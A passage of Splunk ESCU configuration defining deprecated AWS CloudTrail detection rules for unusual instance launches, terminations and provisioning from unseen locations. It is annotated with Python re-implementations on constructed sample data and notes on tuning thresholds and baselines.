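    # repo C: five sources worth 150, but split 3/2 across two tactics -> neither row fires
    *({"_time": 1713390000 + i, "risk_object": "github.com/acme/infra", "risk_object_type": "other",
       "analyticstories": ["Dev Sec Ops"], "calculated_risk_score": 30, "source": f"Detection {i} (constructed)",
       "mitre_tactic": "initial-access" if i < 3 else "execution", "mitre_technique_id": "T1195.001"}
      for i in range(5)),
    # excluded by the where clause: wrong risk_object_type / wrong analytic story
    {"_time": 1713390000, "risk_object": "mallory", "risk_object_type": "user", "analyticstories": ["Dev Sec Ops"],
     "calculated_risk_score": 500, "source": "User Detection (constructed)", "mitre_tactic": "initial-access",
     "mitre_technique_id": "T1078"},
    {"_time": 1713390000, "risk_object": "github.com/acme/payments", "risk_object_type": "other",
     "analyticstories": ["Some Other Story"], "calculated_risk_score": 500, "source": "Other Story (constructed)",
     "mitre_tactic": "initial-access", "mitre_technique_id": "T1078"},
]


def risk_rule_by_repository(events, story="Dev Sec Ops", object_type="other", min_sources=3, min_score=100):
    """Mirror of the tstats search: filter on analytic story and risk object type, group by
    (risk_object, risk_object_type, mitre_tactic), aggregate, then keep groups with
    source_count > min_sources and sum_risk_score > min_score."""
    groups = defaultdict(lambda: {"firstTime": None, "lastTime": None, "sum_risk_score": 0,
                                  "sources": set(), "technique_ids": set()})
    for ev in events:
        if story not in ev["analyticstories"] or ev["risk_object_type"] != object_type:
            continue
        g = groups[(ev["risk_object"], ev["risk_object_type"], ev["mitre_tactic"])]
        t = ev["_time"]
        g["firstTime"] = t if g["firstTime"] is None else min(g["firstTime"], t)
        g["lastTime"] = t if g["lastTime"] is None else max(g["lastTime"], t)
        g["sum_risk_score"] += ev["calculated_risk_score"]
        g["sources"].add(ev["source"])
        g["technique_ids"].add(ev["mitre_technique_id"])
    hits = []
    for (obj, obj_type, tactic), g in sorted(groups.items()):
        if len(g["sources"]) > min_sources and g["sum_risk_score"] > min_score:
            hits.append({"risk_object": obj, "risk_object_type": obj_type, "mitre_tactic": tactic,
                         "firstTime": g["firstTime"], "lastTime": g["lastTime"],
                         "sum_risk_score": g["sum_risk_score"],
                         "source_count": len(g["sources"]), "source": sorted(g["sources"]),
                         "mitre_technique_id_count": len(g["technique_ids"]),
                         "mitre_technique_id": sorted(g["technique_ids"])})
    return hits


if __name__ == "__main__":
    for hit in risk_rule_by_repository(SAMPLE_RISK_EVENTS):
        print(hit)
```

The constructed `github.com/acme/infra` repository shows a consequence of the search's `by ... mitre_tactic` clause that is easy to miss: five distinct detections worth 150 points are split into a 3-source and a 2-source row, so neither crosses `source_count > 3`. If you want the threshold to apply per repository regardless of tactic, drop the tactic from the `by` clause and keep it only in the `values()` aggregation.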
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High AWS Instances Launched by User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Launched by User - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=RunInstances errorCode=success | bucket span=10m _time | stats count AS instances_launched by _time userName | eventstats avg(instances_launched) as total_launched_avg, stdev(instances_launched) as total_launched_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_launched > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_launched - total_launched_avg) / total_launched_stdev, 2) | table _time, userName, instances_launched, num_standard_deviations_away, total_launched_avg, total_launched_stdev | `abnormally_high_aws_instances_launched_by_user_filter`

[ESCU - Abnormally High AWS Instances Launched by User - MLTK - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment.
action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High AWS Instances Launched by User - MLTK - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Launched by User - MLTK - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=RunInstances errorCode=success `abnormally_high_aws_instances_launched_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_launched by _time src_user | apply ec2_excessive_runinstances_v1 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1

[ESCU - Abnormally High AWS Instances Terminated by User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where an abnormally high number of instances were successfully terminated by a user in a 10-minute window. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where an abnormally high number of instances were successfully terminated by a user in a 10-minute window. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment.
action.escu.known_false_positives = Many service accounts configured within your AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify whether this search alerted on a human user.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High AWS Instances Terminated by User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS EC2 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Terminated by User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=TerminateInstances errorCode=success | bucket span=10m _time | stats count AS instances_terminated by _time userName | eventstats avg(instances_terminated) as total_terminations_avg, stdev(instances_terminated) as total_terminations_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_terminated > total_terminations_avg+(total_terminations_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_terminated - total_terminations_avg) / total_terminations_stdev, 2) | table _time, userName, instances_terminated, num_standard_deviations_away, total_terminations_avg, total_terminations_stdev | `abnormally_high_aws_instances_terminated_by_user_filter`

[ESCU - Abnormally High AWS Instances Terminated by User - MLTK - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user successfully terminates an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user successfully terminates an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. The threshold value should be tuned to your environment.
action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.
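The 10-minute-window, standard-deviation outlier test that the four `Abnormally High AWS Instances Launched/Terminated by User` searches above implement (the non-MLTK variants directly, the MLTK variants through a pre-trained model), re-implemented in Python as an added example that is not Splunk's code. It runs offline over constructed CloudTrail-shaped records; the user names, counts and the service-account list are assumptions for illustration. The example is parameterised by API name, so one function covers both `RunInstances` and `TerminateInstances`.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone
from statistics import mean, stdev

BUCKET = timedelta(minutes=10)
_BASE = datetime(2024, 4, 17, 21, 0, tzinfo=timezone.utc)

# Constructed CloudTrail-shaped records: (eventTime, eventName, errorCode, userName).
# CloudTrail omits errorCode on success; the Splunk add-on fills in "success".
SAMPLE_EVENTS = []
for user in ("alice", "bob", "carol", "dave"):            # normal engineers
    for i, n in enumerate((1, 2, 1, 1, 2, 1)):            # launches per 10-minute window
        for _ in range(n):
            SAMPLE_EVENTS.append(((_BASE + i * BUCKET).isoformat(), "RunInstances", "success", user))
burst = (_BASE + 5 * BUCKET + timedelta(minutes=3)).isoformat()
SAMPLE_EVENTS += [(burst, "RunInstances", "success", "mallory")] * 80          # suspicious burst
SAMPLE_EVENTS += [(burst, "RunInstances", "success", "svc-autoscaler")] * 75   # legitimate service account
SAMPLE_EVENTS += [(burst, "RunInstances", "Client.UnauthorizedOperation", "mallory"),  # failed call: ignored
                  (burst, "TerminateInstances", "success", "mallory")]                 # other API: ignored
NOW = _BASE + 5 * BUCKET + timedelta(minutes=9)   # wall clock of the scheduled run


def bucket_start(ts):
    """Floor a timestamp to its 10-minute window (`bucket span=10m _time`)."""
    t = datetime.fromisoformat(ts)
    return t - timedelta(minutes=t.minute % 10, seconds=t.second, microseconds=t.microsecond)


def count_per_window(events, event_name, service_accounts=frozenset()):
    """`stats count by _time userName` over successful calls of one API."""
    counts = Counter()
    for ts, name, error_code, user in events:
        if name == event_name and error_code == "success" and user not in service_accounts:
            counts[(bucket_start(ts), user)] += 1
    return counts


def find_outliers(events, event_name, now, threshold=4.0, service_accounts=frozenset()):
    """Flag (window, user) counts above mean + threshold * stdev of *all* (window, user)
    counts in the search period, keeping only the most recent window, as the SPL does.
    Two deliberate differences from the SPL: service accounts are removed before the
    baseline is computed, and a zero or undefined standard deviation yields no result
    instead of a division by zero in num_standard_deviations_away."""
    counts = count_per_window(events, event_name, service_accounts)
    if len(counts) < 2:
        return []
    values = list(counts.values())
    avg, sd = mean(values), stdev(values)          # Splunk's stdev() is the sample stdev
    if sd == 0:
        return []
    cutoff = now.replace(second=0, microsecond=0) - BUCKET   # relative_time(now(), "-10m@m")
    hits = []
    for (window, user), n in counts.items():
        if window >= cutoff and n > avg + threshold * sd:
            hits.append((window.isoformat(), user, n, round(abs(n - avg) / sd, 2)))
    return sorted(hits)


if __name__ == "__main__":
    print("no service-account filter:", find_outliers(SAMPLE_EVENTS, "RunInstances", NOW))
    print("service accounts removed: ", find_outliers(SAMPLE_EVENTS, "RunInstances", NOW,
                                                      service_accounts={"svc-autoscaler"}))
```

The constructed data makes the rule's documented false-positive advice concrete: the `eventstats` baseline is global and includes the window under test, so a chatty service account does not merely add its own alert, it inflates the standard deviation until the real 80-instance burst falls under `avg + 4 * stdev` and is missed entirely. Filtering service accounts before the baseline (as above), rather than only from the output, avoids that; so does a longer baseline than the rule's one-hour dispatch window.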
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High AWS Instances Terminated by User - MLTK - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS EC2 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Abnormally High AWS Instances Terminated by User - MLTK - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=TerminateInstances errorCode=success `abnormally_high_aws_instances_terminated_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_terminated by _time src_user | apply ec2_excessive_terminateinstances_v1 | rename "IsOutlier(instances_terminated)" as isOutlier | where isOutlier=1

[ESCU - AWS Cloud Provisioning From Previously Unseen City - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\
This search will fire any time a new city is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your city, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.
action.escu.creation_date = 2018-03-16
action.escu.modification_date = 2018-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen City - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen City - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by City | eval newCity=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCity=1 | table City] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, City, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_city_filter`

[ESCU - AWS Cloud Provisioning From Previously Unseen Country - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching over, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\
This search will fire any time a new country is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.
action.escu.creation_date = 2018-03-16
action.escu.modification_date = 2018-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen Country - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen Country - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Country | eval newCountry=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCountry=1 | table Country] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Country, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_country_filter`

[ESCU - AWS Cloud Provisioning From Previously Unseen IP Address - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\
This search will fire any time a new source IP address is seen for any kind of provisioning activity. If you typically do all provisioning from a fixed set of source addresses, there should be few false positives. Note that the subsearch only considers addresses that **GeoIP** can resolve to a country, so if you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.
action.escu.creation_date = 2018-03-16
action.escu.modification_date = 2018-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen IP Address - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen IP Address - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` (eventName=Run* OR eventName=Create*) [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | table sourceIPAddress] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_ip_address_filter`

[ESCU - AWS Cloud Provisioning From Previously Unseen Region - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS provisioning activities from previously unseen regions. Region in this context is a GeoIP subdivision, similar to a state in the United States, not an AWS region. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS provisioning activities from previously unseen regions. Region in this context is a GeoIP subdivision, similar to a state in the United States, not an AWS region. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\
This search will fire any time a new region is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your region, there should be few false positives. If you are located in regions where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.
action.escu.creation_date = 2018-03-16
action.escu.modification_date = 2018-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Cloud Provisioning From Previously Unseen Region - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Suspicious Provisioning Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - AWS Cloud Provisioning From Previously Unseen Region - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Suspicious Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
